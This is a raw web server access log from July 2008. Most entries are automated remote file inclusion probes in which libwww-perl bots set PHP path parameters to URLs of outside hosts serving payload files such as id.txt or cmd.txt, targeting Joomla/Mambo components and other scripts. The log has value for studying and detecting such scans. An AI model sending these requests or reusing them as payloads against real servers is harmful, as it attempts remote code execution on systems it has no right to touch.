71.71.211.182 - - [29/Jul/2008:02:56:50 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
71.71.211.182 - - [29/Jul/2008:02:57:16 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
84.21.71.133 - - [29/Jul/2008:02:57:26 -0500] "GET /logs/access_log.1212883200//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://bosanskinovi.info/components/com_zoom/lib/id? HTTP/1.1" 404 383 "-""libwww-perl/5.805"
69.73.154.249 - - [29/Jul/2008:02:58:12 -0500] "GET /logs/netcat/require/e404.php?DOCUMENT_ROOT=http://www.rfpoa.com/Forum/image.php?u=36977 HTTP/1.1" 404 312 "-""libwww-perl/5.810"
69.73.154.249 - - [29/Jul/2008:02:58:12 -0500] "GET /netcat/require/e404.php?DOCUMENT_ROOT=http://www.rfpoa.com/Forum/image.php?u=36977 HTTP/1.1" 404 307 "-""libwww-perl/5.810"
82.215.5.179 - - [29/Jul/2008:02:58:37 -0500] "GET /logs//toolbar.php?dirDepth=http://www.icamotorediciones.es/administrator/popups/id.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
82.215.5.179 - - [29/Jul/2008:02:58:38 -0500] "GET //toolbar.php?dirDepth=http://www.icamotorediciones.es/administrator/popups/id.txt? HTTP/1.1" 404 296 "-""libwww-perl/5.79"
84.21.71.133 - - [29/Jul/2008:02:58:50 -0500] "GET /logs//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://bosanskinovi.info/components/com_zoom/lib/id? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
84.21.71.133 - - [29/Jul/2008:02:58:51 -0500] "GET //path/components/com_facileforms/facileforms.frame.php?ff_compath=http://bosanskinovi.info/components/com_zoom/lib/id? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
89.108.66.182 - - [29/Jul/2008:03:00:27 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://bosanskinovi.info/components/com_zoom/lib/id?? HTTP/1.1" 404 361 "-""libwww-perl/5.812"
89.108.66.182 - - [29/Jul/2008:03:00:28 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://bosanskinovi.info/components/com_zoom/lib/id?? HTTP/1.1" 404 356 "-""libwww-perl/5.812"
82.215.5.179 - - [29/Jul/2008:03:00:43 -0500] "GET /logs//frontpage_right.php?loadadminpage=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
82.215.5.179 - - [29/Jul/2008:03:00:44 -0500] "GET //frontpage_right.php?loadadminpage=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
71.71.211.182 - - [29/Jul/2008:03:01:01 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
160.99.12.231 - - [29/Jul/2008:03:01:20 -0500] "GET /logs/access_log.1214438400//atom.php5?page=http://genthal.com/alba.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
205.234.243.181 - - [29/Jul/2008:03:02:12 -0500] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
205.234.243.181 - - [29/Jul/2008:03:02:12 -0500] "GET //theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
88.84.151.157 - - [29/Jul/2008:03:06:09 -0500] "GET /logs//config.php?DIR=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
88.84.151.157 - - [29/Jul/2008:03:06:10 -0500] "GET //config.php?DIR=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
66.216.91.89 - - [29/Jul/2008:03:06:29 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
66.216.91.89 - - [29/Jul/2008:03:06:29 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
209.97.201.148 - - [29/Jul/2008:03:07:47 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
209.97.201.148 - - [29/Jul/2008:03:07:47 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
205.234.232.195 - - [29/Jul/2008:03:08:12 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
205.234.232.195 - - [29/Jul/2008:03:08:12 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
75.125.91.162 - - [29/Jul/2008:03:09:58 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.boardal.com/lang/readme.txt%0D?? HTTP/1.1" 404 336 "-""libwww-perl/5.811"
75.125.91.162 - - [29/Jul/2008:03:09:58 -0500] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.boardal.com/lang/readme.txt%0D?? HTTP/1.1" 404 341 "-""libwww-perl/5.811"
72.3.138.50 - - [29/Jul/2008:03:13:19 -0500] "GET /?sourcedir=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.65"
72.3.138.50 - - [29/Jul/2008:03:13:24 -0500] "GET /logs/?sourcedir=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 200 36689 "-""libwww-perl/5.65"
82.215.5.179 - - [29/Jul/2008:03:18:38 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
82.215.5.179 - - [29/Jul/2008:03:18:38 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
89.111.179.12 - - [29/Jul/2008:03:19:13 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
89.111.179.12 - - [29/Jul/2008:03:19:13 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
66.225.215.205 - - [29/Jul/2008:03:19:38 -0500] "GET /logs/access_log.1207785600/skin/zero_vote/ask_password.php?dir=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.810"
66.225.215.205 - - [29/Jul/2008:03:19:38 -0500] "GET /skin/zero_vote/ask_password.php?dir=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
66.225.215.205 - - [29/Jul/2008:03:19:38 -0500] "GET /logs/skin/zero_vote/ask_password.php?dir=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
209.97.201.148 - - [29/Jul/2008:03:21:51 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
209.97.201.148 - - [29/Jul/2008:03:21:52 -0500] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.79"
38.99.44.104 - - [29/Jul/2008:03:24:24 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)"
207.213.245.1 - - [29/Jul/2008:03:24:55 -0500] "GET /logs/access_log.1214438400//include/write.php?dir=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 329 "-""libwww-perl/5.65"
207.213.245.1 - - [29/Jul/2008:03:24:56 -0500] "GET //include/write.php?dir=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.65"
207.213.245.1 - - [29/Jul/2008:03:24:56 -0500] "GET /logs//include/write.php?dir=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
207.213.245.1 - - [29/Jul/2008:03:25:03 -0500] "GET /logs/access_log.1214438400//include/write.php?dir=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.65"
207.213.245.1 - - [29/Jul/2008:03:25:03 -0500] "GET //include/write.php?dir=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.65"
207.213.245.1 - - [29/Jul/2008:03:25:04 -0500] "GET /logs//include/write.php?dir=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
209.97.201.148 - - [29/Jul/2008:03:26:15 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
209.97.201.148 - - [29/Jul/2008:03:26:15 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
195.70.36.107 - - [29/Jul/2008:03:33:17 -0500] "GET /logs/errors.php?error=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
195.70.36.107 - - [29/Jul/2008:03:33:18 -0500] "GET /errors.php?error=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.97.201.148 - - [29/Jul/2008:03:33:38 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
209.97.201.148 - - [29/Jul/2008:03:33:38 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
207.213.245.215 - - [29/Jul/2008:03:33:43 -0500] "GET /logs/access_log.1214438400//include/write.php?dir=http://server.classyhost.com/~pictures/safe.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.65"
207.213.245.215 - - [29/Jul/2008:03:33:43 -0500] "GET //include/write.php?dir=http://server.classyhost.com/~pictures/safe.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.65"
207.213.245.215 - - [29/Jul/2008:03:33:43 -0500] "GET /logs//include/write.php?dir=http://server.classyhost.com/~pictures/safe.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
64.38.22.250 - - [29/Jul/2008:03:34:46 -0500] "GET /logs/page.php5?id=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
64.38.22.250 - - [29/Jul/2008:03:34:46 -0500] "GET /page.php5?id=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
205.234.198.174 - - [29/Jul/2008:03:35:09 -0500] "GET /logs/access_log.1207785600/skin/zero_vote/ask_password.php?dir=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.810"
205.234.198.174 - - [29/Jul/2008:03:35:10 -0500] "GET /skin/zero_vote/ask_password.php?dir=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
205.234.198.174 - - [29/Jul/2008:03:35:10 -0500] "GET /logs/skin/zero_vote/ask_password.php?dir=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
87.106.22.71 - - [29/Jul/2008:03:35:22 -0500] "GET /logs/page.php5?id=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.106.22.71 - - [29/Jul/2008:03:35:23 -0500] "GET /page.php5?id=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
62.75.222.111 - - [29/Jul/2008:03:35:38 -0500] "GET /logs/page.php5?id=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
62.75.222.111 - - [29/Jul/2008:03:35:38 -0500] "GET /page.php5?id=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.86.110.83 - - [29/Jul/2008:03:36:03 -0500] "GET /logs/page.php5?id=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
88.86.110.83 - - [29/Jul/2008:03:36:04 -0500] "GET /page.php5?id=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
216.81.239.15 - - [29/Jul/2008:03:37:38 -0500] "GET /logs//adodbt/sql.php?classes_dir=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
216.81.239.15 - - [29/Jul/2008:03:37:38 -0500] "GET //adodbt/sql.php?classes_dir=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
64.26.63.17 - - [29/Jul/2008:03:38:51 -0500] "GET /logs/?sourcedir=http://paijoe.007gb.com/cmd.txt? HTTP/1.1" 200 93161 "-""libwww-perl/5.803"
64.26.63.17 - - [29/Jul/2008:03:38:51 -0500] "GET /?sourcedir=http://paijoe.007gb.com/cmd.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
72.3.138.50 - - [29/Jul/2008:03:41:01 -0500] "GET /?sourcedir=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.65"
72.3.138.50 - - [29/Jul/2008:03:41:01 -0500] "GET /logs/?sourcedir=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 200 93161 "-""libwww-perl/5.65"
81.198.180.10 - - [29/Jul/2008:03:43:13 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.198.180.10 - - [29/Jul/2008:03:43:14 -0500] "GET //index.php?DOCUMENT_ROOT=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.108.66.182 - - [29/Jul/2008:03:46:51 -0500] "GET /logs//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://bosanskinovi.info/components/com_zoom/lib/id?? HTTP/1.1" 404 343 "-""libwww-perl/5.812"
89.108.66.182 - - [29/Jul/2008:03:46:52 -0500] "GET //path/components/com_facileforms/facileforms.frame.php?ff_compath=http://bosanskinovi.info/components/com_zoom/lib/id?? HTTP/1.1" 404 338 "-""libwww-perl/5.812"
210.245.87.117 - - [29/Jul/2008:03:47:40 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
205.234.200.220 - - [29/Jul/2008:03:47:42 -0500] "GET /logs/netcat/search.php?DOCUMENT_ROOT=http://www.rfpoa.com/Forum/image.php?u=36977 HTTP/1.1" 404 306 "-""libwww-perl/5.810"
205.234.200.220 - - [29/Jul/2008:03:47:42 -0500] "GET /netcat/search.php?DOCUMENT_ROOT=http://www.rfpoa.com/Forum/image.php?u=36977 HTTP/1.1" 404 301 "-""libwww-perl/5.810"
210.245.87.117 - - [29/Jul/2008:03:47:47 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
210.245.87.117 - - [29/Jul/2008:03:47:47 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
202.155.5.40 - - [29/Jul/2008:03:47:53 -0500] "GET /logs/access_log.1212278400//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://legalref.ru/config/idfx.txt?? HTTP/1.0" 404 348 "-""Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
202.155.5.40 - - [29/Jul/2008:03:47:53 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://legalref.ru/config/idfx.txt?? HTTP/1.0" 404 326 "-""Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
202.155.5.40 - - [29/Jul/2008:03:47:53 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://legalref.ru/config/idfx.txt?? HTTP/1.0" 404 321 "-""Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
81.198.180.10 - - [29/Jul/2008:03:48:39 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.198.180.10 - - [29/Jul/2008:03:48:39 -0500] "GET //index.php?DOCUMENT_ROOT=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
64.119.177.12 - - [29/Jul/2008:03:48:57 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
64.119.177.12 - - [29/Jul/2008:03:48:57 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
89.111.179.12 - - [29/Jul/2008:03:49:00 -0500] "GET /logs/errors.php?error=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.111.179.12 - - [29/Jul/2008:03:49:00 -0500] "GET /errors.php?error=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
193.207.106.54 - - [29/Jul/2008:03:51:19 -0500] "GET /?sourcedir=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
193.207.106.54 - - [29/Jul/2008:03:51:29 -0500] "GET /logs/?sourcedir=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 200 93161 "-""libwww-perl/5.79"
89.108.64.96 - - [29/Jul/2008:03:51:55 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.812"
89.108.64.96 - - [29/Jul/2008:03:51:55 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.812"
151.1.210.219 - - [29/Jul/2008:03:52:34 -0500] "GET /logs/access_log.1212883200/indeks.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
151.1.210.219 - - [29/Jul/2008:03:52:34 -0500] "GET /indeks.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
151.1.210.219 - - [29/Jul/2008:03:52:34 -0500] "GET /logs/access_log.1212883200/admin.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
151.1.210.219 - - [29/Jul/2008:03:52:35 -0500] "GET /logs/indeks.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
151.1.210.219 - - [29/Jul/2008:03:52:35 -0500] "GET /admin.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
151.1.210.219 - - [29/Jul/2008:03:52:35 -0500] "GET /logs/admin.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
207.213.245.215 - - [29/Jul/2008:03:53:02 -0500] "GET /logs/access_log.1214438400//atom.php5?page=http://server.classyhost.com/~pictures/safe.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
207.213.245.215 - - [29/Jul/2008:03:53:02 -0500] "GET //atom.php5?page=http://server.classyhost.com/~pictures/safe.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
207.213.245.215 - - [29/Jul/2008:03:53:02 -0500] "GET /logs//atom.php5?page=http://server.classyhost.com/~pictures/safe.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
74.6.18.221 - - [29/Jul/2008:03:53:17 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.31.166 - - [29/Jul/2008:03:53:17 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
151.1.210.219 - - [29/Jul/2008:03:53:22 -0500] "GET /logs/access_log.1212883200/join.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
151.1.210.219 - - [29/Jul/2008:03:53:23 -0500] "GET /join.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
151.1.210.219 - - [29/Jul/2008:03:53:23 -0500] "GET /logs/join.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
209.97.201.148 - - [29/Jul/2008:03:53:42 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://sujianto.com/load.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
209.97.201.148 - - [29/Jul/2008:03:53:43 -0500] "GET //index.php?DOCUMENT_ROOT=http://sujianto.com/load.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
207.213.245.1 - - [29/Jul/2008:03:54:06 -0500] "GET /logs/access_log.1214438400//atom.php5?page=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
207.213.245.1 - - [29/Jul/2008:03:54:07 -0500] "GET //atom.php5?page=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
207.213.245.1 - - [29/Jul/2008:03:54:07 -0500] "GET /logs//atom.php5?page=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
74.53.240.146 - - [29/Jul/2008:03:55:40 -0500] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
74.53.240.146 - - [29/Jul/2008:03:55:40 -0500] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
151.1.210.219 - - [29/Jul/2008:03:56:01 -0500] "GET /logs/access_log.1212883200/modules.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
151.1.210.219 - - [29/Jul/2008:03:56:01 -0500] "GET /modules.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
151.1.210.219 - - [29/Jul/2008:03:56:02 -0500] "GET /logs/modules.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
207.213.245.1 - - [29/Jul/2008:03:57:53 -0500] "GET /logs/access_log.1214438400//atom.php5?page=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
207.213.245.1 - - [29/Jul/2008:03:57:53 -0500] "GET //atom.php5?page=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
207.213.245.1 - - [29/Jul/2008:03:57:54 -0500] "GET /logs//atom.php5?page=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
151.1.210.219 - - [29/Jul/2008:03:58:00 -0500] "GET /logs/access_log.1212883200/forum/vacans/339/join.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
151.1.210.219 - - [29/Jul/2008:03:58:00 -0500] "GET /forum/vacans/339/join.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
151.1.210.219 - - [29/Jul/2008:03:58:01 -0500] "GET /logs/forum/vacans/339/join.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
84.21.71.133 - - [29/Jul/2008:03:58:42 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://bosanskinovi.info/components/com_zoom/lib/id? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
84.21.71.133 - - [29/Jul/2008:03:58:42 -0500] "GET //index.php?DOCUMENT_ROOT=http://bosanskinovi.info/components/com_zoom/lib/id? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
151.1.210.219 - - [29/Jul/2008:03:59:33 -0500] "GET /logs/access_log.1212883200/errors.php?error=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
151.1.210.219 - - [29/Jul/2008:03:59:34 -0500] "GET /errors.php?error=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
151.1.210.219 - - [29/Jul/2008:03:59:34 -0500] "GET /logs/errors.php?error=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
89.108.64.96 - - [29/Jul/2008:03:59:47 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.812"
89.108.64.96 - - [29/Jul/2008:03:59:47 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.812"
72.3.138.50 - - [29/Jul/2008:04:00:37 -0500] "GET //index.php?DOCUMENT_ROOT=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
72.3.138.50 - - [29/Jul/2008:04:00:37 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
205.234.198.225 - - [29/Jul/2008:04:00:45 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
205.234.198.225 - - [29/Jul/2008:04:00:46 -0500] "GET //index.php?DOCUMENT_ROOT=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
74.53.240.146 - - [29/Jul/2008:04:04:05 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
74.53.240.146 - - [29/Jul/2008:04:04:05 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
91.121.192.238 - - [29/Jul/2008:04:04:53 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://szalikowcy.mlodzi.pl/serwis/uploads/download/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
91.121.192.238 - - [29/Jul/2008:04:04:53 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://szalikowcy.mlodzi.pl/serwis/uploads/download/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
194.79.75.195 - - [29/Jul/2008:04:04:58 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://rotihidup.com/components/com_rss/id??? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
